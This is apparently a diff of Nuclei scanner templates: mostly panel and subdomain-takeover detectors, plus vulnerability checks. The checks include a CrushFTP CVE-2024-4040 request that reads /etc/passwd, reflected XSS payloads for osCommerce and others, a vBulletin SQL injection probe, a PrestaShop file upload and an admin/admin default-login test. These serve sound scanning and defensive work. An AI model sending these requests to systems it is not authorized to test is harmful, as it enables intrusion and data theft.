payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- admin
|
||||
|
||||
host-redirects: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains_all(body_2, "<script>alert(document.domain)</script>", "SOPlanning")'
|
||||
condition: and
|
||||
# digest: 4a0a00473045022100b2ba794854d39f477eba7ecc4a2ef4a49c3994da43c6768fa8b7833d9ff576a8022036b5166302b1717b96a5fbae6062df8b924ee738794571eae1eb2fe2aa69dc55:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,125 @@
|
|||
id: CVE-2024-4040
|
||||
|
||||
info:
|
||||
name: CrushFTP VFS - Sandbox Escape LFR
|
||||
author: DhiyaneshDK,pussycat0x
|
||||
severity: critical
|
||||
description: |
|
||||
VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
|
||||
impact: |
|
||||
Successful exploitation could lead to unauthorized access to sensitive data.
|
||||
remediation: |
|
||||
Apply the vendor-supplied patch or upgrade to the latest version to mitigate CVE-2024-4040.
|
||||
reference:
|
||||
- https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/
|
||||
- https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update
|
||||
- https://www.reddit.com/r/crowdstrike/comments/1c88788/situational_awareness_20240419_crushftp_virtual/
|
||||
- https://www.reddit.com/r/cybersecurity/comments/1c850i2/all_versions_of_crush_ftp_are_vulnerable/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2024-4040
|
||||
cwe-id: CWE-94,CWE-1336
|
||||
epss-score: 0.016
|
||||
epss-percentile: 0.87316
|
||||
cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 2
|
||||
vendor: crushftp
|
||||
product: crushftp
|
||||
shodan-query: html:"CrushFTP"
|
||||
tags: cve,cve2024,lfr,crushftp,vfs,kev
|
||||
|
||||
flow: |
|
||||
if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) {
|
||||
// if username or password is not provided, run unauthenticated exploit
|
||||
http("unauth-exploit")
|
||||
} else {
|
||||
// if username and password is provided, run login script and authenticated exploit
|
||||
http("login") && http("auth-exploit")
|
||||
}
|
||||
|
||||
http:
|
||||
# unauthenticated exploit
|
||||
- id: unauth-exploit
|
||||
raw:
|
||||
- |
|
||||
GET /WebInterface/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
- |
|
||||
POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- "root:x:"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/xml"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: auth
|
||||
internal: true
|
||||
part: header_1
|
||||
group: 1
|
||||
regex:
|
||||
- 'currentAuth=([0-9a-zA-Z]+)'
|
||||
# login script
|
||||
- id: login
|
||||
raw:
|
||||
- |
|
||||
GET /WebInterface/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
- |
|
||||
POST /WebInterface/function/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 111
|
||||
Origin: {{RootURL}}
|
||||
Referer: http://{{RootURL}}/WebInterface/login.html
|
||||
|
||||
command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926
|
||||
|
||||
stop-at-first-match: true
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
internal: true
|
||||
words:
|
||||
- "<response>success</response>"
|
||||
|
||||
- type: word
|
||||
part: header_2
|
||||
internal: true
|
||||
words:
|
||||
- "text/xml"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: auth
|
||||
internal: true
|
||||
part: header_2
|
||||
group: 1
|
||||
regex:
|
||||
- 'currentAuth=([0-9a-zA-Z]+)'
|
||||
# authenticated exploit
|
||||
- id: auth-exploit
|
||||
raw:
|
||||
- |
|
||||
POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "root:x:"
|
||||
# digest: 490a00463044022034365345ca960cac174d54cf353f25ea720b065bf9bd3d8e354696368908c0b702203f998746363311340e85f3d692227a4c849f84ebe03837ea3004486821b6e19c:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2024-4348
|
||||
|
||||
info:
|
||||
name: osCommerce v4.0 - Cross-site Scripting
|
||||
author: Kazgangap
|
||||
severity: medium
|
||||
description: |
|
||||
A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/178375/osCommerce-4-Cross-Site-Scripting.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-4348
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
|
||||
cvss-score: 4.3
|
||||
cve-id: CVE-2024-4348
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 2
|
||||
shodan-query: html:"osCommerce"
|
||||
tags: packetstorm,xss,rxss,oscommerce
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1"
|
||||
- "{{BaseURL}}/watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<ScRiPt>alert('document_domain')</ScRiPt>"
|
||||
- "Listing of all products on the site"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a0046304402204d3f2a0f97eb7ea7fe180e934519026ed231f12223669f51926597f7209ee4a402201edf5e99628b2435af3325bf2f7cac5db876ef8960118f25a1b0cbe87998d6dd:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,49 @@
|
|||
id: soplanning-default-login
|
||||
|
||||
info:
|
||||
name: SOPlanning - Default Login
|
||||
author: Kazgangap
|
||||
severity: high
|
||||
description: |
|
||||
SOPlanning contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://www.soplanning.org/en/
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: soplanning
|
||||
product: soplanning
|
||||
shodan-query: html:"soplanning"
|
||||
tags: soplanning,default-login
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /process/login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
login={{username}}&password={{password}}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- admin
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'title="Logout"'
|
||||
- 'title="Modify my profile"'
|
||||
- 'Settings'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100b3d86e9e10bde636e6ff84016fd5241457bcac181d4c2b3192a646880f744dc902205cb3645bb990dc1492bf69406d5d8bdf9cfb6c1f2673f843d980c65713f09a92:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,37 @@
|
|||
id: cyberchef-panel
|
||||
|
||||
info:
|
||||
name: Cyber Chef Panel - Detect
|
||||
author: rxerium
|
||||
severity: info
|
||||
description: |
|
||||
A Cyber Chef Panel was detected
|
||||
reference:
|
||||
- https://cyberchef.org
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"CyberChef"
|
||||
tags: panel,cyberchef,login,detect
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<title>CyberChef</title>'
|
||||
- 'The Cyber Swiss Army Knife'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100eeeab550b83b31bc31e069dbc7d7cce471d8989ea66e1b428296670776bee510022063c48214d5a3acd4d45dc0a9a6332f1d1d6af2a34518b2388a9183e83622e986:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -2,7 +2,7 @@ id: ms-exchange-web-service
|
|||
|
||||
info:
|
||||
name: Microsoft Exchange Web Service - Detect
|
||||
author: bhutch
|
||||
author: bhutch,userdehghani
|
||||
severity: info
|
||||
description: |
|
||||
Microsoft Exchange Web Services was detected.
|
||||
|
|
@ -23,7 +23,9 @@ http:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/EWS/Exchange.asmx"
|
||||
- "{{BaseURL}}/owa/service.svc"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
|
|
@ -34,9 +36,10 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 401
|
||||
- 302
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
- x_owa_version
|
||||
# digest: 490a0046304402206f5d9c0e0b23e4a8ae9d2f4b99f3688c2daef6cb59037899bfea6455bbcf654f0220058960e38002865396412449c4bd3a73c107d3ffbb32c56088b70801e6cbef79:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100fb3512635763556b898da7ebbc54996873117953a7ba2fbc3b876c9a8a133c94022100e38b042a828cb26dcee5a24ebc661d61e01dba07dc2265fe1e5315b99ef39ecb:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,34 @@
|
|||
id: openwebui-panel
|
||||
|
||||
info:
|
||||
name: Openweb UI Panel - Detect
|
||||
author: rxerium
|
||||
severity: info
|
||||
description: |
|
||||
An OpenWebUI panel was detected
|
||||
reference:
|
||||
- https://openwebui.com/
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:-286484075
|
||||
verified: true
|
||||
max-request: 1
|
||||
tags: panel,openwebui,login
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Open WebUI</title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a00463044022048aa2d97cb641c772a571a2a22c80a72ab6ecde248ac954dd98c6f0c6d5c132a022028396fa47061b9bf3c01e83d1c68f4ecfe3b48e213c90ef7fd1d60e78dfd3106:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -1,7 +1,7 @@
|
|||
id: rdweb-panel
|
||||
|
||||
info:
|
||||
name: RD Web Access - Panel Detect
|
||||
name: RD Web Access Panel - Detect
|
||||
author: rxerium,sorrowx3
|
||||
severity: info
|
||||
description: |
|
||||
|
|
@ -11,12 +11,12 @@ info:
|
|||
classification:
|
||||
cpe: cpe:2.3:a:microsoft:remote_desktop:*:*:*:*:android:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
product: remote_desktop
|
||||
shodan-query: html:"RD Web Access"
|
||||
vendor: microsoft
|
||||
verified: true
|
||||
tags: panel,login,rdp,web-access,microsoft
|
||||
shodan-query: html:"RD Web Access"
|
||||
tags: panel,login,rdp,web-access,Microsoft,detect
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
|
|
@ -24,16 +24,19 @@ http:
|
|||
- '{{BaseURL}}/RDWeb/'
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 1
|
||||
max-redirects: 2
|
||||
|
||||
matchers-condition: and
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "TSWAFeatureCheckCookie=true; path=/RDWeb/"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
||||
# digest: 4b0a00483046022100b7bd22946afb7a0c73f3415567391e04361324b834a9c1f09a9c667ff9037b9d022100f0f3c01f592d151a12b1646bc53cc6476f189947426cadaeecc52cc2e1d37cd2:922c64590222798bb761d5b6d8e72950
|
||||
- type: word
|
||||
part: response
|
||||
words:
|
||||
- "<rdp-client-top-view>"
|
||||
- "Microsoft Remote Desktop"
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100d8d5f14d81fae08877f82099f30744869551a6a2f479d508120a516ab6fb8335022100ff88220b9a98dfb6d2d2a80179efe81c1900430b2e67740c681830d8e98843bc:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,43 @@
|
|||
id: teamforge-panel
|
||||
|
||||
info:
|
||||
name: TeamForge Panel - Detection
|
||||
author: lstatro
|
||||
severity: info
|
||||
description: |
|
||||
TeamForge Login Panel was discovered.
|
||||
reference:
|
||||
- https://digital.ai/products/teamforge/
|
||||
metadata:
|
||||
shodan-query: title:"TeamForge :"
|
||||
fofa-query: title="TeamForge :"
|
||||
verified: true
|
||||
max-request: 1
|
||||
tags: panel,teamforge,login
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>TeamForge :"
|
||||
- "Log In to TeamForge"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: version
|
||||
part: body
|
||||
regex:
|
||||
- "teamforge(\\d+)"
|
||||
# digest: 4b0a00483046022100eafaf68f542e3da6a5f1b773c1feeef158b2441185e3be71c6fcb57e60093517022100ab0a381b8d93304d88deb969b7e289ce04ff71bc91173661685955160fd4dcb4:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -22,7 +22,7 @@ http:
|
|||
- "{{BaseURL}}/settings.php.save"
|
||||
- "{{BaseURL}}/settings.php.swp"
|
||||
- "{{BaseURL}}/settings.php.txt"
|
||||
- "{{BaseURL}}config/settings.old.php"
|
||||
- "{{BaseURL}}/config/settings.old.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
@ -35,4 +35,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100eba9de4436d8e08669f91da6cbd54d44279778bcf9fec5b5e930a1d6b5f8e56e022100a11699b4af7715f48e25cc159b1709c6396bf4ae8be69c37d82a477bc75689f5:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100bfdece869f625f103aa1abf3d734cc9c383709e5ee0cceaf35396893fbf45db8022100f0cd8e024f5a399219c954b811b55195a197848196c3b7c610d984e30f03cfda:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -3,7 +3,7 @@ id: cloudflare-rocketloader-htmli
|
|||
info:
|
||||
name: Cloudflare Rocket Loader - HTML Injection
|
||||
author: j3ssie
|
||||
severity: low
|
||||
severity: unknown
|
||||
description: |
|
||||
The Rocket Loader feature in Cloudflare allow attackers to inject arbitrary HTML into the website. This can be used to perform various attacks such as phishing, defacement, etc.
|
||||
remediation: Disable the rocket loader or Add a CSP header to fix this issue.
|
||||
|
|
@ -39,4 +39,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a004630440220078dae8c97372b931bd7435693b67c204a81c9411fcbe20e1fc657d63704bdff02200cc52e3711d11352ce0f241c9cc79a6371d05c0070ec19166837dfcea4382ead:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502204d31387c924b19c1fe6ea3ac22a8c991cac1bee85fff7482d398b5817711313b022100f6125416aaf2f9132f5aac7ac183e6f855f343124e33e429d10bb07af5553fdb:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,33 @@
|
|||
id: eyoucms-installer
|
||||
|
||||
info:
|
||||
name: EyouCMS - Installation
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
description: EyouCMS installation is exposed.
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
fofa-query: title="eyoucms"
|
||||
tags: misconfig,eyoucms,install
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/install/index.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "EyouCms"
|
||||
- "/install/index.php?step=2"
|
||||
- "使用协议</p>"
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022005864c291f566f94cb1cc5267ab73f7b7b0d2b18a6f1c698c2a27afc1dbace6b02210096de625a1792dfa0a8ef36f8cf036acd78968f54f7726da711d3a777b31fe1a5:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -31,6 +31,7 @@ http:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- contains(tolower(header), 'x-guploader-uploadid')
|
||||
- contains(tolower(header), "aliyunoss")
|
||||
negative: true
|
||||
|
||||
- type: word
|
||||
|
|
@ -77,4 +78,4 @@ http:
|
|||
regex:
|
||||
- '<li>BucketName: (.*?)</li>'
|
||||
- '<BucketName>(.*?)</BucketName>'
|
||||
# digest: 4a0a00473045022052c03d64bf92ed3e2156360f7da406ef950a4292a8d29b08de54d645483122e1022100a8172443bfd3c3b235f40e2963f3f37d538106e9004629cd1393c789bfb7983c:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100a1bf43094a8a2ebf252d9ff331d334da4732cc4973121200c8d1a1faad8c0d0002201952b9324faa832fbed0e7662d820c1e56ea3f0820a3a67bc11da01926bba9b0:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,36 @@
|
|||
id: squadcast-takeover
|
||||
|
||||
info:
|
||||
name: Squadcast Takeover Detection
|
||||
author: philippedelteil
|
||||
severity: high
|
||||
reference:
|
||||
- https://github.com/EdOverflow/can-i-take-over-xyz/issues/398
|
||||
metadata:
|
||||
max-request: 1
|
||||
tags: takeover,squadcast
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- Host != ip
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'There doesn’t seem to be an active status page associated with this URL.'
|
||||
- 'Please check the URL and try again.'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 404
|
||||
# digest: 4a0a00473045022073e3651947c403258a6376ad586534893f46abfcd2d9728c1d0edbeab2ff2be4022100f20a52cd2ab0ea4a4ebeabc28511e0ccb3aaaebffaac719e499d3662b7a127e7:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: high
|
||||
description: surge takeover was detected.
|
||||
reference:
|
||||
- https://github.com/EdOverflow/can-i-take-over-xyz
|
||||
- https://github.com/EdOverflow/can-i-take-over-xyz/issues/198
|
||||
metadata:
|
||||
max-request: 1
|
||||
tags: takeover
|
||||
|
|
@ -25,4 +25,8 @@ http:
|
|||
- type: word
|
||||
words:
|
||||
- project not found
|
||||
# digest: 490a00463044022064c4ab13768f1a4fa885670b9020a4c8ac4cc28f650d65e7b146c52d1ccbd6fe02201650ae50cfbcbbf6790afdd7de6a939cb12ca3348c31167ade8a032969493f04:922c64590222798bb761d5b6d8e72950
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 404
|
||||
# digest: 4a0a004730450221008687ea9c91087816fda6cde6f2654de22d64f00f4452d3c150919a3d02c09d80022010aceb815c267cd65a6a2d4a9e2632b00ab2724596e2edaa4f816b872406f809:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -1,12 +1,12 @@
|
|||
id: unauthenticated-jenkins
|
||||
|
||||
info:
|
||||
name: Unauthenticated Jenkins Dashboard
|
||||
name: Jenkins Dashboard - Unauthenticated Access
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: Jenkins Dashboard is exposed to external users.
|
||||
metadata:
|
||||
max-request: 1
|
||||
max-request: 2
|
||||
tags: jenkins
|
||||
|
||||
http:
|
||||
|
|
@ -21,9 +21,8 @@ http:
|
|||
- type: word
|
||||
words:
|
||||
- Dashboard [Jenkins]
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100cef11be2e4fc4d5fe925f91269917b5763805635e48d3ae6c5ead57dbe56d9e0022100e2b91fe6026d44a02b15e34655c58d3a95cb070db314386bbb568a1f1b05ace3:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402202b26e420567b42984cf73e1432a2d97a046c3a65adce12505d6c7f15b8117a3702207727a946b018ec8d53a5d62b3cb34129cdd87d1d85d2fac1efa37332668197eb:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -1,45 +0,0 @@
|
|||
id: academy-lms-xss
|
||||
|
||||
info:
|
||||
name: Academy Learning Management System 5.11 - Cross-Site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
Academy Learning Management System 5.11 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/170514/Academy-LMS-5.11-Cross-Site-Scripting.html
|
||||
- https://vulners.com/packetstorm/PACKETSTORM:170514
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cwe-id: CWE-80
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: http.html:"Academy LMS"
|
||||
tags: packetstorm,lms,academy,xss
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<script>alert(document.domain)</script>'
|
||||
- 'Academy LMS'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a004830460221009e530a17ae78eac3aa6f5f7068e7bf08f565124913897a0d1dd64d31f40788d2022100b28dd0a800a903ce5787b586745bf33830e97dec0adc8a91858774a5ba5218c9:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -17,7 +17,7 @@ info:
|
|||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}preview.php?controller=Load&action=index&catid=moztj%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ems3ea&down_up=a"
|
||||
- "{{BaseURL}}/preview.php?controller=Load&action=index&catid=moztj%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ems3ea&down_up=a"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
|
|
@ -26,5 +26,4 @@ http:
|
|||
- 'contains(body, "><script>alert(document.domain)</script>") && contains(body, "New Topic")'
|
||||
- 'contains(content_type, "text/html")'
|
||||
condition: and
|
||||
|
||||
# digest: 4a0a004730450221009c6ff6f5b059c822eaf5fc7399b0fcfc8b4b8ab99bdf3d5541bcbac5591ccaca022066329ee7e27e760f069414e1cd4d583f8bb56bfa9981f1a24fd31f24421711a9:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100a8c54695560c315e38751b221c77539e1614299bcaad0046383880c77e8fca0b022036a2cf634429cbab82c74c9633e30a0d31b3acb8babf044601ef51816fdbf453:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,49 @@
|
|||
id: prestashop-cartabandonmentpro-file-upload
|
||||
|
||||
info:
|
||||
name: Prestashop Cart Abandonment Pro File Upload
|
||||
author: MaStErChO
|
||||
severity: critical
|
||||
reference:
|
||||
- https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/
|
||||
- https://dh42.com/blog/prestashop-security/
|
||||
metadata:
|
||||
framework: prestashop
|
||||
shodan-query: http.component:"prestashop"
|
||||
verified: true
|
||||
max-request: 1
|
||||
tags: intrusive,file-upload,cartabandonmentpro,prestashop
|
||||
|
||||
variables:
|
||||
filename: '{{rand_base(7, "abc")}}'
|
||||
title: '{{rand_base(7, "abc")}}'
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /modules/cartabandonmentpro/upload.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=xYzZY
|
||||
|
||||
--xYzZY
|
||||
Content-Disposition: form-data; name="image"; filename="{{filename}}.php.png"
|
||||
Content-Type: image/png
|
||||
|
||||
<html>
|
||||
<!-- {{title}} -->
|
||||
</html>
|
||||
|
||||
--xYzZY--
|
||||
|
||||
- |
|
||||
GET /modules/cartabandonmentpro/uploads/{{filename}}.php.png HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(header_2, "image/png")'
|
||||
- 'contains(body_1, "{{filename}}.php.png")'
|
||||
- 'status_code_1 == 200 && status_code_2 == 200'
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100de92782af5f1630bc6e15e5f559a18b2d829e22e0cea3452c013a54974c9c84f0221009371017eb7a14acd8fc29c5975ef5cd9f0b8f73582066b39db1294758b231b6a:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -14,7 +14,7 @@ info:
|
|||
verified: true
|
||||
max-request: 1
|
||||
fofa-query: title="TitanNit Web Control"
|
||||
tags: titanit,web-control,ssrf,oast,rce
|
||||
tags: titanit,web-control,oast,rce
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
|
@ -34,4 +34,4 @@ http:
|
|||
part: body
|
||||
words:
|
||||
- "titan.css"
|
||||
# digest: 4b0a00483046022100879d069429630f609a358e6d75ca42bc2a252e693eacd5871e1fd985f8c45a9d022100a9e019ea6c7dbc14a86cca85d5e089e3a2ef69454aedbbd719d6e15f9a5321dc:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502204924c878a5a761c1445ca81b66143ef9dc59bee364ee1c721712f16e3c4fc6d80221008fa2593dc7557f42af384a29e3b87cab735bd2cb14cc635787fe6809aef33640:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,42 @@
|
|||
id: vbulletin-search-sqli
|
||||
|
||||
info:
|
||||
name: vBulletin `Search.php` - SQL Injection
|
||||
author: MaStErChO
|
||||
severity: high
|
||||
description: |
|
||||
vBulletin 4 is vulnerable to an SQL injection vulnerability, which may allow an attacker can execute malicious SQL statements that control a web application's database server.
|
||||
remediation: Upgrade to the latest version of vBulletin.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/17314
|
||||
- https://web.archive.org/web/20181129123620/https://j0hnx3r.org/vbulletin-4-x-sql-injection-vulnerability/
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: http.component:"vBulletin"
|
||||
tags: vbulletin,sqli
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /search.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
contenttypeid=7&do=process&humanverify=1&cat[]=-1%27
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "type=dberror"
|
||||
- "MySQL Error"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 503
|
||||
condition: or
|
||||
# digest: 4b0a0048304602210084dd0d783afb78cfa19cc10f84030918f06fe86708e84bc6d5bfdf4ced8fe10c02210094a54b19eb0bb0c4c16160977a3be435769921093900186566c64fa372caafdb:922c64590222798bb761d5b6d8e72950
|
